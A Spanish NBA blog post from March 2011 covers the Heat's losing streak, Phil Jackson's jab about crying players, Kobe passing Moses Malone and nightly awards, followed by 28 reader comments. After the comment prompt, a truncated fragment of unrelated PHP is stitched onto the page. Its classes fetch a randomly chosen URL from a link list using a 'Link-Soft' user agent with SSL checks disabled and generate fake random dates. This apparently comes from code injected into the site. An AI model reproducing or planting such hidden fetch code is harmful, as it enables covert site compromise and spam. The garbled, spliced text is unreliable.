La Crónica (08/03/2011)

09 de March de 2011 por TheDeerHunter

Menuda se ha liado en Miami. Crisis total. Otra derrota más de una interminable racha. Otra vez en casa, esta vez los Blazers en el mejor partido hasta la fecha de Gerald Wallace con su nueva camiseta. Una vez más en un último cuarto al que se llegaba con el marcador igualado. A más de uno la situación empieza a sobrepasarle y ayer se notó, por ejemplo, en una actuación bochornosa de Chris Bosh, por mucho que él ahora se queje de su papel en el equipo. Ha trascendido que en ese vestuario hubo llantos tras la última derrota ante Chicago, algo difícilmente perdonable en una cultura como aquella. Escándalo en toda regla y una excusa perfecta para hacer sangre, para aquellos que les conviene hacerla o para cualquiera. Al fin y al cabo había muchas ganas acumuladas.

No le ha faltado tiempo a Phil Jackson para salir a la palestra. En su caso no es casualidad. Hay enfrentamiento directo a la vista y los focos le han apuntado a él y a su equipo durante buena parte de la campaña. “This is the NBA: No Boys Allowed,” Jackson said. “Big boys don’t cry. But, if you’re going to do it, do it in the toilet where no one can see.” Al maestro Zen siempre la ha ido bien empezar a ganar los partidos desde su púlpito. Los Lakers parecen haber puesto el “playoff mode” y ayer le volvieron a pasar por encima a los Hawks. Como para traspasar a Bynum ahora. Zona que pisa, zona que arrasa. Kobe pasó a Moses como 6º anotador de la historia. Menuda semanita le están dando al legendario ala-pívot. La siguiente víctima de la lista es Shaq y me da que La Mamba Negra disfrutará ese reto como ninguno. Poco más de 1.000 puntos tienen la culpa. No será esta campaña.

Los Suns aprovecharon la baja de Scola en su victoria contra Houston. Partidazo simultáneo, agarráos a la silla, de Vince Carter y Hakeem Warrick. El objetivo está cada día más cerca.
Los Sixers ganaron a los Pacers y parecen haber asegurado virtualmente su plaza de postemporada. Extraordinaria exhibición colectiva con 7 hombres en dobles dígitos. A la excelente plantilla colectiva que maneja el bueno de Doug sólo le falta un punto de dinamita.

Para terminar no me pidáis demasiado entusiasmo con los dos últimos partidos. Los Warriors ganaron a Cleveland y los Bucks a Washington. La postemporada de los ciervos está a dos partidos de distancia.

PREMIOS

MVP: Con dos actuaciones portentosas consecutivas y todos los palos que solemos darle se lo merece más que nadie. Vince Carter: 32 puntos, 6 rebotes y 3 asistencias. Go Suns!!!

Rookie: El día que Griffin no juega se lo solemos dar a Wall. Casi un triple doble para la “muralla maravilla”… pero con un 4 de 17 en tiro y 5 pérdidas. El premio se lo “birla” contra pronóstico su nuevo compañero Jordan Crawford, que aprovechó a la perfección su oportunidad con 22 puntos, 4 rebotes, 3 asistencias y 2 robos en 27 minutos.

Sorpresa: El que era considerado por uno como “el mejor cuatro ofensivo de la liga”. 32 puntos, 8 rebotes, 4 asistencias de Hakim Warrick. Mañana tocará la de arena, no os preocupéis.

Decepción: Bosh… estamos contigo. Tus compañeros son un poquito “golas” y te dan poca bola… pero con tu partidito de anoche mejor la boquita cerrada que estás más guapo. No había tiempo para lloriquear antes, mira tú por donde.

Esfuerzo en vano: Wade o LeBron. Cualquiera de los dos servirían como candidatos al MVP de la jornada, sino al de la temporada… ¿Qué es lo que falla? Posiblemente el propio modelo.

Imágenes | AP Photos / Getty Images

Comenta

28 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Voy a ser ventajista y voy a sacar pecho para que luego me lo partan en el siguiente partido. VINSANITY que GRANDE eres, espero que cojas un poco de regulariadad y ver a los SUNS de los viejos rockeros dando guerra en Play Offs

      Citar

  2. TheDeerHunter dice:
    #2

    Por cierto, no lo he dicho pero por lo visto McMallon ha renovado 2 años por los Blazers.
    Por una vez y sin que sirva de precedente me alegro un montón por la noticia. Para mí supone todo un alivio.

      Citar

  3. Denise dice:
    #3

    McMillan debería ser nombrado entrenador del año, aunque a otros le pesen 🙂
    Dampier no está ni para aportar 5 minutos de calidad, y Ilgausakas está ya más muerto que vivo, a esto, hay que añadir que Chalmers y Bibby forman una de las peores parejas de bases de la liga, y encima se toman el lujo de cortar a Arroyo.
    En las estadisticas totales, solo se contabiliza la temporada regular?

      Citar

  4. Viva_Dirk dice:
    #4

    Ayer Bynum pasó por encima de Horford sin demasiados problemas, cuanto molaria verlo sano el resto de su carrera.

    Me uno a Deer en el alivio de que McMillan siga haciendo de Portland un equipo pequeño y deje a los Lakers tranquilos.

    Pobre Moses, lo igualan en dobles-dobles, Kobe lo supera en anotación y encima lo llaman ala-pivot :p

      Citar

  5. TheDeerHunter dice:
    #5

    Juer… entrenador del año nada menos!!! qué baratos se reparten los premios últimamente XD XD XD

      Citar

  6. Denise dice:
    #6

    Bueno, que otro candidato mejor que McMillan hay para entrenador del año. En relación plantilla-rendimiento, Portland es el mejor, y más aun con las lesiones que ha tenido.
    No sé por qué los lakerianos tienen tantas dudas con su próximo entrenador. Estoy seguro que va a ser alguien “de la casa”. Apuesto por Brian Shaw o Byron Scott.

      Citar

  7. Busky23 dice:
    #7

    Antes de que acabe la semana los Lakers se hacen con la segunda plaza del Oeste.
    Spolestra va directo a la horca,Riley ya calienta motores…

      Citar

  8. GreenPride dice:
    #8

    Y los Beach Boys se la volvieron a pegar…. nuevamente. Espera, espera que estoy ya lo he puesto antes. ¡Ah, no que vale también para hoy! Vaya desastre de los Heat. Les tocaban 10 de 11 partidos contra equipos con más del 50% de victorias y hasta ese momento los Heat tenían record negativo contra este tipo de equipos (los buenos vamos). Estaba claro que era el momento cumbre de su Regular Season además con muchos de esos partidos en casa. Particularmente esperaba a ver si el equipo era aspirante real en estos partidos o se le veían las costuras y no es que esté pasando esto último es que está siendo una verdadera debacle. Dejando de lado el partido contra los Wizards, sus últimos 6 partidos han sido derrotas contra Chicago 2 veces (en casa y fuera), Orlando (en casa), San Antonio (palizón de 30 fuera) y New York (en casa). Yo estoy sorprendido de cómo dos figuras del tamaño de Wade y LeBron han sido incapaces de sacar adelante ni un último cuarto igualado en todos estos partidos. El ataque se embota probablemente por la falta de tiradores fiables y sobre todo por la falta de una amenaza interior. Si a ello se une que Wade y LeBron son malos lanzadores de 3 las defensas se cierran y los Heat no saben que hacer. Además en defensa sufren un horror pues ni Bibby ni Chalmers defienden a nadie, ayer Andre Miller les dio una lección en el último cuarto, y los pivots tampoco pueden parar a los interiores del otro equipo (idem de lo de Miller con Aldridge). Como el uno y el cinco no pueden la defensa se desajusta y adiós. Realmente ahora no se ve cómo van a salir de esta crisis que amenaza con pasar facturas importantes (Spoelstra???).
    Y lo peor es que se cierne sobre ellos el siguiente calendario: Lakers, Memphis, San Antonio, Oklahoma, Atlanta y Denver son sus siguientes 6 partidos, miedo da pensar lo que pueda pasar si estos 6 partidos siguen como los 6 anteriores. Por de pronto tienen que ganar como sea a los Lakers el jueves para intentar coger moral aunque viendo el juego de ambos equipos parece difícil pensar como lo van a hacer.
    Los Lakers precisamente, ahora sí han cogido su juego y lo hacen como campeones que son. Gran presencia interior de Bynum y Gasol (¿Como van a pararlos los Heat?) y la Mamba dando sus toques venenosos con una muy mejorada defensa colectiva. Con este juego vuelven a ser principales candidatos al título

      Citar

  9. TheDeerHunter dice:
    #9

    ¿En relación plantilla-rendimiento?? Muy discutible.
    Menos discutible es en relación excusas-rendimiento. Como todos los años. Y la diferencia de rendimiento con lesiones o sin ellas ya me dirás tú cual ha sido.

    Si algo le ha salvado la cabeza a McMillan todo este tiempo ha sido precisamente la calidad y profundidad de una plantilla contra la que él mismo se ha mostrado públicamente descontento, por activa y por pasiva.

    Tic, tac… el reloj avanza y el proyecto que heredó de Pritchard se marchita. Veremos lo que queda de todo eso.

      Citar

  10. GreenPride dice:
    #10

    En mi comentario sobre los Heat decir que estaba mal el dato: son 12 de 13 partidos contra equipos con más del 50% de victorias y de momento 6 derrotas, loas dichas de Chicago 2 veces (en casa y fuera), Orlando (en casa), San Antonio (palizón de 30 fuera) y New York (en casa) y esta última contra Portland.

      Citar

  11. Vader dice:
    #11

    Tremendo lo de los Heat. A parte del big three el resto del equipo es muy malo y Wade y Lebron son cromos repetidos. Lo más inteligente seria traspasar este verano a LeBron o Wade pero quien se atreve a tomar esa medida… Muy dificil, pero como este año o el siguiente no ganen el anillo ya podeis contar que pasara eso.

    Saludos

      Citar

  12. Denise dice:
    #12

    Traspasar a Wade y Lebron? Ni loco los traspasaba.
    Lo que tienen que hacer el proximo verano es quitarse de en medio a Mike Miller y a Haslem e ir a por un par de pivots.
    De todas formas, no hay que darles por muerto. Yo sigo pensando que con un poco de ayuda del resto, pueden ganar el campeonato perefctamente.

      Citar

  13. Sancho88 dice:
    #13

    Coincido con Campo2. Acojonante Vicente. Phoenix siempre mola, esté quien esté, mientras juegue el jefe. Me encanta la actitud defensiva de Hill y de Gortat, pero les falta un hombre exterior y otro interior de confianza para hacer algo en playoffs. ahora bien, yo pienso que serán el octavo pasajero. Utah fuera, logicamente

      Citar

  14. TheDeerHunter dice:
    #14

    Si los Heat caen contra Lakers el próximo partido… no es que se puedan dar por muertos seguro. Pero casi…

      Citar

  15. the wolf dice:
    #15

    en referencia a lo que dice vader de traspasar a wade o lebron…sencillamente imaginar que es lo que darían el 75% de los equipos de la liga por alguno de ellos ya es una locura y seria un verano de rumores de lo mas divertido, el problemas es que aunque no ganen el anillo este año esa opcion es un poco descabellada y seguramente muy lejos de la realidad

      Citar

  16. Denise dice:
    #16

    “”Si los Heat caen contra Lakers el próximo partido… no es que se puedan dar por muertos seguro. Pero casi…””
    Discrepo rotundamente. Si los Lakers ganan mañana, lo unico que supondría es que practicamente conseguirián el factor cancha en una hipotetica final vs Miami,
    Pero dar por muerto a un equipo donde juega Lebron (el mejor jugador de la liga), Wade y Bosh es una temeridad.
    ¿Alguien dio por muerto a los Lakers cuando fueron humillados por Celtics y Heat en el Staples?
    ¿O por sus vergonzosas recientes derrotas contra Bobcats por 20 puntos, o contra los Cavaliers que no ganan a nadie?
    Pues lo mismo.

      Citar

  17. Scriers dice:
    #17

    Estoy de acuerdo. Dar por muertos a los Heats es una temeridad. Ahora bien, ¿Habéis visto últimamente sus partidos? Es un equipo que parece poco trabajado tácticamente, no juegan a nada, su baloncesto no es siquiera espectacular, no se… muchas dudas. Pero no tantas como para matarlos.

      Citar

  18. GreenPride dice:
    #18

    De acuerdo con todos vosotros. No se puede dar por muerto a un equipo con tanta calidad en 3 de sus titulares como Wade, LeBron y Bosh. También es cierto que su juego despierta más que dudas porque no se ve indolencia como en los Lakers cuando perdian con los Bobcats por ejemplo sino que se ve que no pueden contra los equipos buenos y es algo que lleva ocurriendo toda la temporada. Dejemoslo en que la cosa tiene mala pinta para ellos en playoffs con una primera eliminatoria muy dura probablemente contra los Knicks y una segunda brutal que casi seguro sería contra los Bulls y con desventaja de campo y si consiguieran pasar una probable final de conferencia contra los Celtics. Desde luego el camino que les espera en playoffs unido a su pésimo juego hacen ser poco optimistas para ellos pero con los jugadores que tienen todavía pueden remontar el vuelo. Personalmente, no los veo para ganar el título este año pero no creo que nadie se pasee en una serie contra ellos

      Citar

  19. Vader dice:
    #19

    Si no ganan el anillo esta temporada seguiran todos los importantes. Pero como esten 2 temporadas sin ganarlo y a menos que se quedaran muy cerca pues yo si pienso que podria saltar el proyecto original y que vieramos el traspaso de uno de los tres grandes.

    Saludos

      Citar

  20. TheDeerHunter dice:
    #20

    Se me ocurren muchas diferencias que invalidan tu comparación y tu conclusión, Denise.
    De entrada los Lakers ya han sido campeones y eso primero les quita urgencias, para lo bueno y para lo malo, pero también les otorga un margen de credibilidad que ningún equipo que no haya sido campeón lo puede tener.
    Después el agravante de los Heat es el momento en el que se ha incendiado todo. Cualquier equipo con aspiraciones tiene una línea ascendente que culmina en los playoffs. Van de menos a más en muchos aspectos y tras el all-star todo el mundo ya afina de cara a la postemporada, sobre todo defensivamente. También en la actitud. Puedes repasar los últimos campeones y comprobar su trayectoria por estas fechas.

    Los Heat directamente se han estrellado contra eso. No sólo que no han econtrado aún su juego sino que se muestran impotentes ante defensas pre-playoffs de los rivales y extremadamente vulnerables emocionalmente. Sólo faltaba el asunto de los lloros como guinda al pastel.

    Como digo… no se les puede dar por muertos por ser quienes son. Pero si pierden contra Lakers al tiempo…

      Citar

  21. Viva_Dirk dice:
    #21

    En un proyecto de tales dimensiones hace falta un técnico de mucha experiencia y que sepa sacar el máximo de cada uno sin que se le levante un motín, vamos que Riley sabe que su momento llegará y es entonces cuando empezarán a ser peligrosos del todo.

      Citar

  22. luigi_sal dice:
    #22

    me encanta leer vuestros comentarios. dos temas: los suns tienen q acelerar para pillar a los hornets, q yo creo q pronto van a ser octavos, porque portland y memphis suben como la espuma -q rivales tan complicados para playoffs-. denver tb va a ser duro de pelar… juegan suns y hornets esta semana o la próxima, junto con otro par de resultados ahí podría estar. me da pena por los rockets, pero estos necesitan urgentemente un pivot.
    alguien me puede decir porq no juega más marreese speights en los sixers, dado el poco rebote que aportan brand y hawes. no lo entiendo, me parece un tío super válido…

      Citar

  23. Scriers dice:
    #23

    A mí lo que no me cuadra es que no juegue más Warrick. Sabemos que Frye y López son más del gusto del entrenador, pero con Nash pega más Warrick, sino, fijaros en la asistencia del resumen de NBA. Además, puede meter tiros abiertos mejor que López. Y también rebotea.

      Citar

  24. Sancho88 dice:
    #24

    esta claro que Warrick se come con patatas a Frye y Lopez, sobre todo al segundo. Frye esta bien por el estilo de juego de suns, siempre con un pivot puro (Gortat o Warrick) y luego un tipo que la sepa meter de fuera, pero cuando se junta con Lopez es una debacle. Y bueno, tampoco es que Warrick sea uno de los mejores pívots de la liga, pero jugando con Nash mejora mucho su rendimiento. Con la potencia que tiene me recuerda mucho a Kenyon Martin, siempre con ganas de hundirla para abajo, jeje. es un buen jugador del pick and roll y se le nota trabajador. Sin duda no es Stat ni se le acerca, pero pensando en el trauma de perder a un jugador como el…. con el trabajo de Warrick y Gortat se minimiza el impacto

      Citar

  25. Scriers dice:
    #25

    A mí es una pareja de Pivots que me gusta. Incluso Frye me gusta, me parece un descarado, puede fallar 7 triples un partido y el siguiente sigue con la misma moral. Y no tiene malos %. A mí esos 3 me gustan. Y López me da que podría exprimirse más en sus recursos, incluso le recuerdo una buena época antes de lesionarse. No se, los Suns me siguen cayendo bien, creo que tienen una plantilla con un muy buen nivel general pero sin superestrellas (debería ser Carter quién añadiera un plus, pero está cuesta abajo) y sigue estando el viejo Nash. Yo los miro y salvo Brooks, todos los jugadores me gustan, Dudley, Hill, Warrick…
    Y Warrick no es dios pero con 30 minutos por partido estoy seguro que haría entre 13-15 puntos y 8-10 rebotes. Segurísimo.

      Citar

  26. portu dice:
    #26

    De acuerdo con Denise en el tema Miami, no puede ser q tengas 3 estrellas para las posiciones 2-3-4 y q los dos siguientes mejores jugadores (MMiller y Haslem) sea tb 2-3 y 4… es un contrasentido q encima ha tenido el agravante de las lesiones. Lo de Dampier, Ilgauskas, Magloire y J. Anthony es casi de broma macabra…
    El proyecto no es del todo malo, pero los mimbres no son los mejores… en cualquier caso no creo q valoren cambios drásticos hasta completar 2 temporadas.

      Citar

  27. Kiki dice:
    #27

    Hacía tiempo que no pasaba por aquí, pero me alegra ver que por fin muchos reconocen que McMillan es un entrenador de primer nivel, de los mejores. Con un estilo reconocible y muy eficaz (para mí atractivo además)y sin excusas por muchas lesiones y problemas que tenga año tras año, sacando lo mejor de la plantilla cada temporada. Es buen entrenador para cualquier tipo de equipo, con mucho o poco talento, y si por una vez tiene una temporada con el equipo al completo, luchará por todo, lo tengo claro.
    El año pasado ya fue el 4º más votado para entrenador del año, tras Brooks, Skiles y Gentry. Se le ha relacionado lógicamente con equipos como Lakers, Heat o Boston para la temporada que viene, pero la noticia de su renovación me ha alegrado y de qué manera. Más merecida, imposible.
    Sólo tienes que ver páginas especializadas de EE.UU. o hablar con gente de allí para darte cuenta del prestigio que tiene. Yo le habría extendido no por dos años, sino por otros 5 o 6.
    GO BLAZERS !!

      Citar

  28. TheDeerHunter dice:
    #28

    Con el miedo todavía en el cuerpo yo se lo hubiera extendido no 5 o 6, sino 10 o 20. Cheque en blanco…
    Ójala McMillan y su prestigio sigan con los Blazers mientras yo viva. Sinceramente me alegraré.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>